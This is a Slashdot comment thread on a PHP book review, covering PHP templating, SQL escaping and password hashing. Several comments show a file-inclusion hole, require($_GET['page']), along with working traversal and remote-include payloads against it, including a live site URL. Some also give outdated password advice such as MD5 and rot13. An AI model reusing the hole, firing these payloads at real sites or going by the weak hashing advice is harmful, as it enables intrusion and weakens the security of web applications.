Personally I can't think of anymore more in-scope for a tutorial book. There's already enough of worthless "tutorial" books that cobble together a useless example and then just cat a bunch of man pages together to pad out the rest of it (in fact, we seem to get a "review" of one of those every couple of weeks here on slashdot).

Re:This is how I learn.

[CastrTroy]

One of the worst examples I ever saw was somebody asking how to make a timer go off at a specific time. In .Net, the timers can only be programmed to fire after x milliseconds. So the response was to fire the timer every second, and then check the time, to see if it was the time you wanted it to be. The correct solution would be to just set the timer interval to DesiredTime.Subtract(Now).TotalMilliseconds. However I went to about 15 different sites before I decided to create a better solution on my own.

Re:This is how I learn.

[saberworks]

This comment is especially infuriating. Most PHP tutorials were written back when there was no other way to connect to a MySQL database other than using mysql_connect. PDO was only recently added to PHP. I guess someone on the internet should invent a magical program that automatically updates every tutorial ever written whenever the geniuses over at zend make a change to PHP. Oh wait, it would end up in a neverending loop.

Re:This is how I learn.

> I started disassembling code from large, popular hacking-targets such as Wordpress.

Either the Wordpress codebase has got a lot better than when I last looked, or that's a scary example!

Re:This is how I learn.

> the really good ones tell you to use mysql_real_escape_string

Just the existence of this function speaks volumes.

Re:This is how I learn.

[H0p313ss]

I think best practices and the ideal implementation in your code is beyond the scope of a tutorial or a book

Only replying because there is no -1 for being flabbergasted

best practices ... beyond the scope of a tutorial or a book WTF?

Though that does explain a lot of the schlock out there that passes for code...

Re:This is how I learn.

[syousef]

Glad to hear it was hobby work. Extending yourself and trying new things in a safe environment is exactly what an IT professional should be doing.

My first experiences programming were....amusing. I still remember at age 7 or so I got my first computer - A Texas Instruments 99/4A - and not knowing whether or not a typo in the code could blow the thing up.

Then there's the fact that mouse droppings in my Apple IIe hard disk was causing disks (including my backup disks) to get wiped. I was writing my first game and all the backups ended up hosed. Put me off programming for a couple of years. Hey I was 8.

Re:This is how I learn.

[Sancho]

That may be true, but you can go to Barnes & Noble or Borders and find books off of the shelf that still teach things that way, with recent publication dates.

Anyway, if they're teaching dangerous programming practices, they should be removed. We don't need generations of ignorant PHP programmers causing SQL-injection in their projects.

Re:This is how I learn.

[RalphSleigh]

PHP 5 is great and all, however many of the cheap hosting plans that make it so popular are stuck with 4. This means all the web tutorials cater to the lowest denominator, and this is PHP4 and the MySQL functions.

Re:This is how I learn.

[Bluesman]

most PHP programmers never learn the right way of doing anything, and when they do, they feel like going back and redoing all their work... ...in a different language :-)

Re:This is how I learn.

[siDDis]

What I really don't understand is how all Books and web tutorials recommend newbies to start with MySQL. What the heck is wrong with SQLite which is available within the standard PHP library! Poor first timers to programming, have to learn to install MySQL, create a user account, create a database and so on(It aint that hard, but can be a bit too much for a beginner). And the worst part, they need a Webhost which offers a MySQL db. SQLite is way easier to learn for the beginner, it reads and writes data faster than MySQL(as long there aren't many concurrent writes), takes WAY less space than MySQL, it has better functionality for data integrity, SQLite is public domain..you do whatever you want to do with it. Heck are there any reasons to use MySQL at all? All I need is SQLite for small projects and PostgreSQL for larger projects.

Re:This is how I learn.

Christ, the whole point in using PHP is that it assumes you're a mature person who is quite capable of escaping strings in a way that is consistent and practical for the application you're building. Using a straight forward "select x from y" allows you to debug and/or understand code quickly. It really irritates me when people take a give-you-enough-rope-to-hang-yourself-with language like PHP and then start adding frameworks, templates, libraries and other bollocks. Just write the fucking code. And if you're thinking "my problem's too complex" or "my team's too big" then you should be coding in Java (or, more likely, you're talking crap).

Re:This is how I learn.

This is basically how I learned PHP. Without any PHP or mysql experience or even understanding the concept of a loop, I used tutorials from webmonkey.com and made cobbled together a weak CMS system over the course of a couple weeks. When I finished I immediately wanted to start over using what I'd learned. Judging by the poor quality of the typical PHP code floating around out there, you're not alone!

Of course, going by your sig, you're just trolling, but like all good trolls, there's a basis in truth.

Re:This is how I learn.

[ttfkam]

Anyway, if they're teaching dangerous programming practices, they should be removed. We don't need generations of ignorant PHP programmers causing SQL-injection in their projects. Good point. I recommend we start with php.net. Eventually the problem should go away. ;-)

Re:This is how I learn.

[Kippesoep]

Blame that on MySQL, not PHP. It's a part of MySQL's C API: http://dev.mysql.com/doc/refman/5.0/en/mysql-real-escape-string.html

Okay, I have a question

[elrous0]

A little off on a tangent, here. But I've never seen this addressed in any of these "Web 2.0" books. Has PHP ever introduced anything that is the equivalent of ASP.NET's "Master Pages"? That's one of the few innovations that I really liked about asp, and the last time I checked, php still didn't have anything quite like it (it was a godsend for me as a developer/designer).

Re:Okay, I have a question

[LowSNR]

The PRADO framework for PHP implements a lot of ASP.NET-ish functionality, including Master Pages. I've used their page templates on a couple of my own sites with great success.

Re:Okay, I have a question

What you're searching for are called "templates", and there is a ton of template engines for PHP. The most famous one is Smarty, but if you find it too big, you can create one easily. It takes less than 20 lines.

Re:Okay, I have a question

[elrous0]

Thanks for the info. I found a tutorial on the site that goes into some detail. Looks like it's exactly the kind of thing I'm looking for.

Re:Okay, I have a question

[sherriw]

Ug. Look, Microsoft did not invent the 'master page' idea. They took a common concept - templating - and gave it their own Microsoft Name and implementation method. And then they spout it like it's some kind of great new invention.

From what I can tell, it is equivalent to having each of your PHP pages include a header and footer into each page.

<?php
require("tpl/header.php");
?>
 
This is my inner page content.
 
<?php
require("tpl/footer.php");
?>

There are also various PHP templating engines that do this for you in various ways, including features like caching. Check out Smarty and Pear.

Re:Okay, I have a question

[elrous0]

Thanks for the info!

Re:Okay, I have a question

[islanduniverse]

If it's like master pages in Expression Web, then that's not quite right... Instead of calling a separate file for the header/footer/etc when the page is generated, the page is kept static.

When you modify the master page, there are areas of the page that you designate as editable regions, and so when anything outside these editable regions is updated in the master page, the change is replicated on to each associated page.

This is assuming these master pages are similar in functionality to the 'dynamic web templates'...

Re:Okay, I have a question

[FredFredrickson]

Yes, PHP has had this, and is used in practice a lot.

<html DESIGN> <? include("dynamic-content.php"); ?> </html DESIGN>

Re:Okay, I have a question

[Firehed]

As someone who works for a .NET company and does freelance work in PHP, I'd suggest that include()s tend to be just as if not more effective, depending on your development style. Of course I'm not the slightest bit experienced with .NET (and even less so with VB/C#, though I could probably pick up the latter in a weekend if I was bothered, given my background with C) and probably am doing it wrong, but my experience with .NET and Master Pages tends to give me a ton of half-assed template files and messy URLs. With PHP, I just call in the appropriate information in index.php with includes (always pulling in header, sidebar, footer as you effectively do in a master page, and sucking in the main content dynamically in some form or another as if it were a contentplaceholder) - and with a touch of .htaccess trickery, I get pretty URLs that I've never found a way to do with aspx work.

It really depends on your background and coding style, if you ask me. I'm not a coder at my day job but I have to be reasonably familiar with what goes on behind the scenes, as I'll have to build out some sample stuff for potential customers from time to time. I almost always find this to be a much more frustrating experience than when I'm doing my freelance php, but a lot of that is the development tools available on Windows really suck compared to what's on the Mac, in my opinion (and for my workflow).

Re:Okay, I have a question

[tute666]

yes. small templating system. like: http://www.massassi.com/php/articles/template_engines/ code contains small bugs, but it illustrates the idea. No buzzword needed.

Re:Okay, I have a question

[Sancho]

That's a really oversimplified example of templating. Templating usually allows you to be more specific--rather than just "inner page content" you can have much smaller bits of dynamic content. In its purest form, your HTML page looks like HTML, but essentially has variables for content (without markup or scripting) that gets replaced on the fly.

The purest form isn't always the best way of doing things, but a good rule of thumb is that the more that your template handles, the better.

Re:Okay, I have a question

[mysqlrocks]

If you're using Zend Framework then Zend_Layout gives you an implementation of the Two Step View pattern which sounds like what you're looking for.

Re:Okay, I have a question

[smellotron]

You can get more sophisticated with your pages...

<?php
require('core.php');

class MyPage extends BasicPage
{
  public function title() {
    return 'This is my title'
  }
  public function links() {
    return array(
      'Home' => local_link('/'),
      'PHP Advocacy' => local_link('/php/why'),
      'PHP Home' => 'http://www.php.net/'
    );
  }

  public function content() {
    $blog = new SillyBlogPage($this->db, $this->get('page', 0));
    $this->display('blog_template', array('blog' => $blog));
  }
}

$page = new MyPage($_SESSION, $_GET);
$page->enable_compression();
$page->set_cache_seconds(600);
// ... gobs of other stuff defined in BasePage
// ... or you could just use global functions,
// ... if you're concerned about mental object bloat

print $page->display();

?>

Just have as many functions as you want overrideable parts.  Template engine, database connection, etc. can all be set up within the context of the parent class.

Re:Okay, I have a question

[Tarwn]

Master pages were actually created in response to the fact that doing includes or "components" (to keep your header and footer logic/presentation centralized in one file) was somewhat painful. It's once again hit the magic MS bar of implementing an idea so far, but no farther. If you look behind the scenes at a number of PHP packages (phpBB3 comes to mind) you will see a full (real) templating system built-in that goes beyond the basic "surround the content with some stuff" that master pages gives you. At the other end of the spectrum you have simple file includes for headers and footers that give you exactly the same capabilities as Master Pages.

If anything, Master Pages to me were another example of ASP.Net going the wrong way. For all of the arguments about separation of logic and presentation, I don't thin the ASP.Net architecture quite gets how the web works and what layer is supposed to be separated. While it is possible to have good seperation between a data abstraction layer, logic, and presentation, what you often get is a mish-mash of the three as ASP.Net attempts to make components available to do the work for you. And the further you wander towards dynamic content and good seperation, the more painful it becomes. Just look at the validator controls and the fact that they have to do extra work to figure out what client0-side control will be called when they are rendered and renamed. ASP.Net starts with the presentation aspect and everything else derives from that. Languages like PHP or ASP 3 may not force you to use data abstraction or other good methods, but it's the same as saying your starting a race at the starting line (PHP) or starting the race 5 miles back and facing the wrong direction (ASP.Net) but man you have some nice shoes to run in.

Re:Okay, I have a question

[Shados]

What do master pages have to do with URLs anyway? And for URLs, ASP.NET has URL mapping built in if you want "pretty" ones. And if the URL mapping features don't do the trick (let say you wanted a complicated scheme), 6 lines of code in an http handler will do it.

Also, C# is probably as close to straight C as Python is to Smalltalk: not very (aside maybe for the brackets)

and all other web languages, ROR, perl, etc..

10 elitists simply can't be right

Re:and all other web languages, ROR, perl, etc..

Perl: 90% of the links you click involves some.

Re:and all other web languages, ROR, perl, etc..

if you're living in 1998

wrong question

[mgkimsal2]

PHP is a language, ASP.NET is a framework (you can use different languages inside of it).

The question to ask is "Have any PHP frameworks introduced or adopted concepts like 'Master Pages'?".

Short answer is that I don't know. However, you'd need to look at things like symfony, codeigniter, cakephp, zendframework, and others. My guess is that no, those frameworks don't have any concepts like 'Master Pages', but I'm not an expert in those frameworks.

Re:wrong question

[elrous0]

PHP is a language, ASP.NET is a framework

Well, yes that is true. But in application they seem to serve similar functions (once you decide what language you're using in PHP). Dynamic server-side content would seem an ideal way to separate layout from content (much in the way CSS separates formatting and content), yet ASP's Master Pages seems to be the only implementation of this simple idea (can't believe it has taken this long for someone to come up with something that would seem so basic). I always expected PHP would come up with something similar (why replicate layout on each page?).

Either way it sucks because I love Master Pages but I hate dealing with the limited script selection you get with ASP.NET.

Re:wrong question

[ianare]

What is so difficult with:

require("header.php");

print 'My content';

require("footer.php"); or ...

print 'top of page';

require($_GET['page'].'.html');

print 'bottom of page';

... where the content is changed with a GET variable, i.e. mylayout.php?page=mycontent

(using print rather than escaping to html due to slashdot restrictions)

Re:wrong question

[hankwang]

print 'top of page';
require($_GET['page'].'.html');
print 'bottom of page';

Well...

wget http://www.blah.com/mylayout.php?page=../../../home/ianare/.mozilla/bookmarks

:-)

Re:wrong question

Heh, no need to settle for bookmarks...

wget http://www.blah.com/mylayout.php?page=/etc/passwd%00

Only thing stopping that is safe mode, if enabled, and if so, I'm sure you can find something interesting owned by the owner of the script.

Re:wrong question

yeah, it really bites, being limited to using C++, C#, JScript, VBScript, J#, Perl#, Ruby#, Python#, F#, etc.

Re:wrong question

[ianare]

Good point, but obviously you need to put some checks in there! Also file permissions need to restrict the php user accordingly.
I was just showing the basic principle.

Try this one, a very very simple site I made (and before anyone bitches I didn't feel like doing the extra work to support IE properly)
http://file-folder-ren.sourceforge.net/index.php?page=/home/ianare/.mozilla/bookmarks

(I'm kinda curious ...)

Re:wrong question

[huckamania]

or ...

print 'top of page';

require($_GET['page'].'.html');

print 'bottom of page'; ... where the content is changed with a GET variable, i.e. mylayout.php?page=mycontent I like this method better. You can do two requires, one that does form and input validation, before you start outputting HTML and another at the bottom that does the content.

switch($page){
    case 1:
        require($page.'_preproc.php');
        break;
    case 2: ...
}

if($errors)
    print 'top of page';
else {
    print 'bad dog';
    exit();
}

switch($page){
    case 1:
        require($page.'_output.php');
        break;
    case 2: ...
} It's not pretty, but it is flexible. For some pages, I have no preprocessing and for others, the preprocessing may determine which page gets output at the bottom.

The only thing I don't like about PHP is that I haven't found an expert voice, along the lines of a Scott Myers for C++. I have a nagging feeling that something I have done has opened a big security hole and it's not going to be pretty if/when someone finds it.

Re:wrong question

[ianare]

I've used something similar to yours, but with different types of content (not processing), some pages would have extra content that needed some extra styling. I just split the file in 2, then do a test for 'mycontent_extra.php' to see whether I should load these.

It's not pretty, but it is flexible. That's how I feel about PHP as a whole. :-)

When I discovered Python after PHP/Perl I was hooked ... much cleaner, much easier to read, and there should be only one way of doing things - the right way.
But you still can't beat PHP when it comes to ease and flexibility for web apps/sites, especially when interfacing with a DB.

Re:wrong question

PHP/Perl

No such thing. About the only thing that Perl and PHP have in common that isn't also present in at least one other mainstream language is the use of the . for string concatenation.

Re:wrong question

[smellotron]

Because it's better (in general) to do something like this:

mycontent.php:
=============
<?php require('header.php'); ?>
...
rest of the page in here
...
<?php require('footer.php'); ?>

Benefits?
* no risk of parameter injection
* better URLs, especially combined with Apache MultiViews (which lets you omit file extensions, so no .html or .php required in URLs)
* cache-friendly, since many HTTP proxies such as squid will never cache URLs with querystring parameters

There are other ways to do it, but in general, it's safest to view individual pages as "subclasses" of a common page layout, where querystring parameters are only necessary for *actually optional items*, the way the HTTP RFCs specify them.  Don't try to make a huge framework inside PHP... the more you offload onto Apache/Squid/what-have-you, the more lightweight/simple your result will be... and that's one of the few strengths PHP has left (^:

Re:wrong question

[brezel]

What is so difficult with:

require("header.php");
print 'top of page';
require($_GET['page'].'.html');
print 'bottom of page'; ... where the content is changed with a GET variable, i.e. mylayout.php?page=mycontent
(using print rather than escaping to html due to slashdot restrictions) weeee what an invitation for spammers.
i almost always try to remotely include google.com when i see crap like this and in 90% of all cases it works.

mylayout.php?page=http://url.to.some.mailer/script.php?

happy spamming.
and no, most hosters are not using php6 or have remote includes disabled.

Re:Yes, it does

[elrous0]

Could you be a little more specific on that one?

Password hashing

[tcopeland]

The reviewer suggests encrypting the password. Well, storing a hashed version of the password is at least a step in the right direction. Storing a salted hash is better, though. Encrypting that salted hash would be another level of security, although I don't think it'd buy you much more than salting it.

Re:Password hashing

[ShatteredArm]

How about hashing the encrypted salted hash?

Re:Password hashing

[tcopeland]

And then ROT-13 it!

Re:Password hashing

[glwtta]

Only if you also salt the hash of the encrypted salted hash - otherwise you are just playing with fire!

Re:Password hashing

[Echolima]

Ever try smoking salted hash?

Oh look, a PHP article

[hellfire]

Yet another guaranteed entertaining flamewar! Hey all you science, art, IT and politics geeks, let's all go watch the programmers burst a blood vessel over how much they hate PHP! It's guaranteed to be a great fireworks display! I got beer and pretzels, you all bring chips or cheezy poofs.

Re:Oh look, a PHP article

Not American "beer", right?

Password handling

[mveloso]

When you're storing passwords, you almost never need the actual password anymore. What you need is a one-way function that can be used so when the user enters the password, the right bits come out (that match the original).

That may be md5, crypt, or whatever, but multiple methods are always better. And it has to be deterministic (ie: the password goes in, and the result is always the same).

If you do need the password later (because you need to stash it for enabling access to other systems), your options are pretty bad. One way or another someone will be able to extract that password, because if they have the database they probably have your source as well. However, since database access is more difficult to secure than your source code, it doesn't hurt to do a couple of transformations on the in-database passwords. You could base64/rot13 it, or do something that's relatively difficult to do in a high-level language (rotating the bits on a 3-byte chunk of the password 5 bites to the right comes to mind).

The big thing is you need to provide a reset mechanism. You can use a questions/answers format or an email link, but in the end users will always forget their password, the answer to their reset questions, and won't get your reset email, so have a process for your support person to reset a password.

Re:Password handling

[dr00g911]

I'll have to concur with this approach. A lot of times with web apps on shared hosts, you don't have the option of saving your config files (with your database config) somewhere 100% secure, and many of the more ghetto Win-based shared hosts give global read permissions on everything for every account on the box, even if you've got a home directory to save to outside of public_html/ or whatever.

Anyhow, what this leads to is you have to assume that your database config isn't even vaguely secure unless you've got root access on your own box for deployment, and it's best not even to make that assumption then. So, we don't save passwords in human-readable format.

If you were paying attention above, if the config file is readable, that means your functions for obfuscating the stored passwords in the database aren't secure either... so it's best not to store the password at all -- store an md5 or crypt hash of the password and check against that.

So, something like:

<?
 
// set encryption key for user passwords - format MUST begin with $1$
// followed by 8 characters and end with $ to correctly create an MD5 signature.
// don't lose track of your salt key, or you're pretty much screwed.
 
$my_encsalt = '$1$MyEncKey$';
 
// read in submitted password, not relying on register_globals, because
// it's really, really evil, even if it's convenient. makes for very injection-prone code.
 
$submitted_password = crypt($_POST['password'],$my_encsalt);
 
?>

I didn't strip tags, add slashes or anything that you should really do as standard procedure on ALL user input (assume it's all hostile) in that example for sake of getting the idea across clearly.

Re:Password handling

... add slashes ... that you should really do as standard procedure on ALL user input

I\'m not sure that\'s such a great idea....

Re:Password handling

[dr00g911]

MD5 crypt hashes produce characters that need escaping if you're going to insert or test against a DB entry ($, ', ", \ etc) , so yes. In this particular case it's necessary.

Secondly, if you're writing an app that's intended to be distributed everywhere, it's best not to rely on magic quotes and just escape stuff manually, but to each their own.

Re:Password handling

[mveloso]

Well, it's a given that if it's user-entered it has to be escaped. It's good to call it out, though, because it may slip by people who aren't as experienced.

But to be safer, use mysql_real_escape_string, pg_escape_string or whatever your local database connection supports.

Re:Password handling

Wow, you epically missed the point. It\'s PHP idiots like you with your "ALWAYS add slashes", without understanding when and why it\'s useful (certainly not for SQL, because you should be using parameterised queries instead), who are responsible for unreadable slash-filled garbage all over the web.

Secondly, if you're writing an app that's intended to be distributed everywhere, it's best not to rely on magic quotes and just escape stuff manually, but to each their own.

WTF does that have to do with anything?

Re:Password handling

[smellotron]

But to be safer, use mysql_real_escape_string, pg_escape_string or whatever your local database connection supports.

You mean "Use PDO and prepared statements", don't you? If you are using a shared host that doesn't provide PHP5 or PDO, get a different shared host.

Re:Password handling

[smellotron]

I didn't strip tags, add slashes or anything that you should really do as standard procedure on ALL user input (assume it's all hostile) in that example for sake of getting the idea across clearly.

Never rely on stripping tags for the input. If you care about protecting your site from malicious user-generated HTML content, do it on output, where it belongs. Especially because this is a password, who are you to say that <script can't be my password?

For that matter, don't use addslashes either. If magic quotes is on, use stripslashes on all of your input and use PDO to protect your database and escapeshellcmd/escapeshellarg to protect your shell and... you get it. addslashes isn't the solution because not everything ends up in an ASCII-encoded MySQL database.

Re:Password handling

[1110110001]

MD5 crypt hashes produce characters that need escaping Not really. Normally you'll get a hexadecimal number as string. So you have 0-9 and a-f (or A-F).

Learning PHP

[DigitalisAkujin]

Personally, I learned PHP over the years by creating simple web applications for various tasks and eventually because the web applications required more and more as they got more complex I was able to slowly and methodically work my way into a private framework I coded myself.

This book, like many other skips over this whole learning process. To really teach a language, any language, you have to explain why you do things as well as the goals.

I also don't like the fact that many PHP books attempt to half ass the teaching of installing LAMP on a LAN server location (localhost or otherwise). They should simply recommend some good hosts and explain the PHP.INI settings that might be of interest as they come up in the programming itself.

No practical tags

[Tridus]

I like how they didn't even bother tagging this article with any of the useful tags, like say "php". Usually a new article starts with a few practical tags, then "slashdottagsmakemesmile" type things show up.

I guess this is the forward progression of Slashdot tags: no attempt at useful tags.

This is a very good way to learn

[Bobb+Sledd]

Say what you want about any language, any database, any scripting... but I have always said: if you have decided that you want to learn that language, then first find out what its capabilities are (do your best to understand their limitations), but come up with a big project that you want to do.

That is how I learned PHP, Javascript, and SQL simultaneously. I decided I wanted a web site that was database-driven and would stream MP3's. I knew what needed to be done, but I didn't always know how. I found people's examples on PHP.net very helpful, and went off on all kinds of tangents reading "Oh, hey if you have this situation, watch out for this...."

Now I can actually do stuff without having to look up function names all the time (though I still have to occasionally).

What did it get me? Well it got me off the telephone with a nice paying job that nearly doubled my salary, and to-date I'm about the best guy I know who does this sort of stuff. (Please don't take me wrong... I know there are people far more proficient at this than me; I'm not saying I'm the best -- just better than 90% of the industry out there, and I am creating useful things.)

I owe it all to that one project I decided to do.

do it yourself

[Greenisus]

i learned a lot of these Web 2.0 techniques by doing them myself on my own site. if you're trying to pick up on all this in cubicle-land, it's going to take a long time to get up to speed. things as simple as RSS feeds can be become quite complicated if you're using a huge legacy content management system. things like AJAX are hard to effectively introduce into a mature J2EE web app.

i knew nothing about RSS feeds, and after a quick read at google I was able to add RSS to my site and get it online in under half an hour. this is because my code is lean, and it's mine. there was no process to follow, no code reviews, no deployment scheduling. nothing, just me and a text editor.

Re:do it yourself

[Gizzmonic]

i knew nothing about RSS feeds, and after a quick read at google I was able to add RSS to my site and get it online in under half an hour. this is because my code is lean, and it's mine. there was no process to follow, no code reviews, no deployment scheduling. nothing, just me and a text editor.

No underwear? Damn, that IS hot!

sha1( (md5(string) + md5(Salt)) )

[DigitalisAkujin]

sha1( (md5(string) + md5(5 char random salt)) ) That's all you will ever need ;)

Re:sha1( (md5(string) + md5(Salt)) )

sha1( (md5(string) + md5(5 char random salt)) ) That's all you will ever need ;)

Lay off the crack!

$passhash = hash('sha256', $pass).$salt;
$passhash = hash('sha256', $pass.$salt);
$passhash = $salt.hash('sha256', $pass);
$passhash = hash_hmac('sha1', $pass, $salt);

When in doubt, try PEAR

[ninjafirepants]

There's plenty of frameworks out there specifically for separating content from layout. Just look in http://pear.php.net/.

I know nothing of ASP or its Master Pages, but when it comes to said separation, I favor HTML_Template_IT for its simplicity. For those who want a more "involved" templating system, there's things like Smarty, which I think doesn't quite have as strict a separation as I'd like.

From my personal expierence

[blanks]

I've been a web developer for about 12 years now, and have worked with .net, asp, php, CGI and so on over the years.

From my expierence of learning new languages and techniques as well as teaching others who are new to web development with such techiques as AJAX; learning off a full blown app with all the bells and whistles all ready added makes it difficult and even more challanging. Many times the code can be misleading and often confusing (most AJAX code I have worked with has been a nightmare) and can often lead to most people not learning but instead simply doing copy/paste of code snippets and simply relying on the fact of "this piece of code works with this form, it will work on this form also" type of mentality of programming.

Don't get me wrong; I am a firm believer that the best way to learn how to program is by trying pre-existing apps that are around to get your feet wet and to see things in action which many of the chapters in the book touch on (authenicating users, user logins) but for many people who are getting into programming IMO planning and designing and application frameworks are not the type of thing anyone should focus on first. How can you start to learn about designing a web application if you have had hardly any expierence with the language itself. And even more so with PHP as this is the gateway drug; er language many people are starting off with in their first step into programming.

Re:From my personal expierence

[Shados]

Totally agree with you there, and I'm having exactly that problem in my current work place... They've been doing Ajax since a few -months- after the introduction of the XML HTTP active X in internet explorer for Outlook Web Access, something like 6-7 years ago, long before the word AJAX came out...

So even though Im fairly knowledgeable in virtually all mainstream or semi-mainstream web technologies of the past decade, from raw C with CGI Bin to .NET with ASP.NET AJAX, I'm looking at the code going "WHAT THE ****". The only thing I can do is either get me one of the "veterans" of the place to spend a week walking me through each sections, or copy pasting, modifying, and hope it works...

Newer ajax applications however, tend to be gems of software architecture... When you use frameworks such as ExtJS or ASP.NET AJAX, with all of the OOP and design patterns, modern software architecture techniques, and loose coupling of components, you end up with extremely clean, easy to understand code. Bonus if you use tools like VS2008 that give intellisense of these frameworks (VS2008's isn't so hot yet, but its just an example instead of naming more obscure javascript IDEs).

From those apps, you can learn a lot of stuff, really easily. My ONLY gripe, is using javascript notations in constructors. You end up with 4 levels of nested javascript object notation constructors, and have absolutely no clue which types are being passed down...so its hard to learn that. I wish Javascript used the C# 3.0 way (having the name of the object in front of the object initializer). Then you could learn how to use it from reading the code... otherwise its documentation time :(

It's called templating ...

[Qbertino]

The concept is called templating and used to be called 'Server Side Includes' (somewhere around 1997 or so ... ). ASP, JSP and PHP are originally SSI languages / templating languages.
And if you want to use templating for your web developement - which is discussion worthy in itself - anything other that TAL (Pe(rl)-TAL, PHP-TAL or 'original' TAL is completely pointless, because the above mentioned languages are nothing but templating solutions in themselves. There is no point bolting another layer of that on top of them. Which is why I strongly dislike Smarty and it's ilk.

Oh, and I highly doubt that ASP has anything as neat and usefull as TAL. Do check out the OSS solutions, they're regarded as technology leaders in the field for a reason, which is one reason ASP & Co. are treated with suspicion.

Re:It's called templating ...

[smellotron]

There is no point bolting another layer of that on top of them. Which is why I strongly dislike Smarty and it's ilk.

Preach it, brotha! I am a fan of PHP, but Smarty has been a huge waste everywhere I've seen it used. I do use "template pages" in PHP, but they're just PHP pages outside of Apache's doc root, separated for reusability.

Re:It's called templating ...

[1110110001]

... PHP-TAL ... There is no point bolting another layer of that on top of them. Which is why I strongly dislike Smarty and it's ilk. PHP-TAL is the same as Smarty just with a different syntax. And much more code in the generated templates. A short 11 lines template, which outputs data in a table gets a 18 line compiled template and smarty, while PHP-TAL needs 40 lines to do the same. And I don't need a benchmark to see PHP-TAL produces slower code with all the function calls and controller classes.

Re:It's called templating ...

[Bitsy+Boffin]

[ Using extrans mode, so I'm quoting old school style here... ]

Qbertino> There is no point bolting another layer of that on top of them.

Hear hear!

All these freaking template languages just re-invent the wheel for the most part. PHP *IS* a template language first and foremost, that's what it was designed to do, that's why we can intermingle PHP with other stuff in the first place. What the hell is wrong with ... ...
how is it any worse than
    {loop y as x} {echo x} {/loop}
and other such constructs which I've seen in "template languages" which invariably do nothing except slow down...everything.

Qbertino> anything other that TAL (Pe(rl)-TAL, PHP-TAL or 'original' TAL

I'll have to disagree here, I just looked at PHP-TAL and it looks little better than anything else I've seen.

The only things I want out of any template language is things to automate stuff. If it doesn't make something EASIER for me, or for designers, or for.. somebody, then I don't want it, it's useless cycle-wasting junk.

{$Foo} instead of is good, provided you can use both. is good instead of a form input and a whole bunch of php/javascript to prefil the value, remember it between posts, perform validation and error checking etc.

But when a template language re-invents loops (tal:repeat="item itemsArray") then I have to say STOP that's retarded, PHP can loop for you JUST FINE.

Now all this said. I was guilty once of writing a template language that re-invented loops, conditionals and other such constructs. The reason for doing so was a) proof of concept, b) I was young and stupid, c) I thought it would make it easier for designers using Dreamweaver. I used it a couple of times, and then thankfully saw how RETARDED I was, how it didn't make ANYTHING easier for anybody, infact it made it more difficult, and promptly threw all that completely pointless crap away.

Re:It's called templating ...

[Bitsy+Boffin]

[ Ahh fuck. How did I do that. Changed it to POT mode before I submitted. Habit. Let's try that again. Wish /. would allow editing posts Digg style. Filling in time because of the annoying required delay. Using extrans mode, so I'm quoting old school style here... ]

Qbertino> There is no point bolting another layer of that on top of them.

Hear hear!

All these freaking template languages just re-invent the wheel for the most part. PHP *IS* a template language first and foremost, that's what it was designed to do, that's why we can intermingle PHP with other stuff in the first place. What the hell is wrong with
    <?php foreach($x as $y) { ?> ... <?php echo $x ?> ... <? } ?>
how is it any worse than
    {loop y as x} {echo x} {/loop}
and other such constructs which I've seen in "template languages" which invariably do nothing except slow down...everything.

Qbertino> anything other that TAL (Pe(rl)-TAL, PHP-TAL or 'original' TAL

I'll have to disagree here, I just looked at PHP-TAL and it looks little better than anything else I've seen.

The only things I want out of any template language is things to automate stuff. If it doesn't make something EASIER for me, or for designers, or for.. somebody, then I don't want it, it's useless cycle-wasting junk.

{$Foo} instead of <?php echo htmlspecialchars($Foo) ?> is good, provided you can use both. <form:input name="MyForm[Blah]" validate="something" type="text" /> is good instead of a form input and a whole bunch of php/javascript to prefil the value, remember it between posts, perform validation and error checking etc.

But when a template language re-invents loops (tal:repeat="item itemsArray") then I have to say STOP that's retarded, PHP can loop for you JUST FINE.

Now all this said. I was guilty once of writing a template language that re-invented loops, conditionals and other such constructs. The reason for doing so was a) proof of concept, b) I was young and stupid, c) I thought it would make it easier for designers using Dreamweaver. I used it a couple of times, and then thankfully saw how RETARDED I was, how it didn't make ANYTHING easier for anybody, infact it made it more difficult, and promptly threw all that completely pointless crap away.

Re:Yes, it does

[c0ol]

I believe what he is hinting at is the fact that PHP, unlike the ASP.NET framework, does not provide functionality on that level. Instead it is up to you to create that functionality, or use a framework where someone else created that functionality for you. Implementing the Master Pages feature in PHP would be a trivial task. You could recursively evaluate templates, capture their ouput, and place that output in the proper location on a parent template, or you could composite the entire thing into one template and then evaluate it. With PHP this kind of implementation detail is under your full control.

Challenging?

[thePowerOfGrayskull]

Because learning and using most of these technologies can be rather challenging to a Web developer

Perhaps if learning and using those technologies is 'challenging' to a web developer, that person should be 'developing' a new career.

All these Web 2.0 books

[Ant+P.]

When is someone going to write a book on how to make good websites?

Not to knock PHP,

[Tangent128]

but I'm fairly sure Slashdot runs on Perl.

... in soviet russia

[TheDreadedGMan]

In Soviet Russia, MSDN navigates you!

It's ugly, but gets the job done.

[porneL]

PHP sucks, but none of its problems are showstoppers. You do have to look up every strwtfbbq function to check needle/hastack order and if someone decided to throw in underscore for a good measure, but after you do that (and go through three dozen application-breaking retarded configuration options) it works, works well enough and scales nicely on loads of different systems and servers.

When in doubt, try anything but PEAR

The error handling alone disqualifies it. Its a great idea horribly implemented. If there is no other solution, take the pear lib you need and divorce it from any pear references. It will make your life a lot easier.

web 2.0 - WHY ?

[unity100]

just show me a reason for the '2.0'. all this buzz, and yet for what reason ?

Object.methods?

[remitaylor]

I disagree re: navigating MSDN to find classes and methods for .NET ... when I was coding with .NET, I always had Reflector open for navigating our own libraries, as well as the .NET ones.

Now, whenever I code in PHP, I'm often on php.net and I *HATE* it.

One of my favorite things about Ruby is how sweet the reflection is and how ridiculously easy it is to look for objects or grep method names, etc, in IRB.

That said, .NET and PHP have shells too - which I always use whenever I code with them. I always used Booish in .NET (Boo's interactive console). For PHP, I use phpsh. Ofcourse, for .NET, you should use Powershell ... but I hate, hate, hate it.

But, in my opinion, nothing beats how easy it is to navigate objects / scope in Ruby. Hell, you could alias a method to print its local_variables and instance_variables before returning. You can eval in the scope of any of your objects, to peek in and see what's what. It's yummy. :)

P.S. While I, too, had many headaches getting new users up and running with .NET, we offered all of our programmers the choice to code in whatever they wanted. Most people used VS, but someone used Eclipse, and I used vim. You don't NEED VS to code .NET. I was happy with vim + NAnt ( + Reflector + Booish ).

Wrong.

[Qbertino]

PHP-TAL is the same as Smarty just with a different syntax.

Wrong.

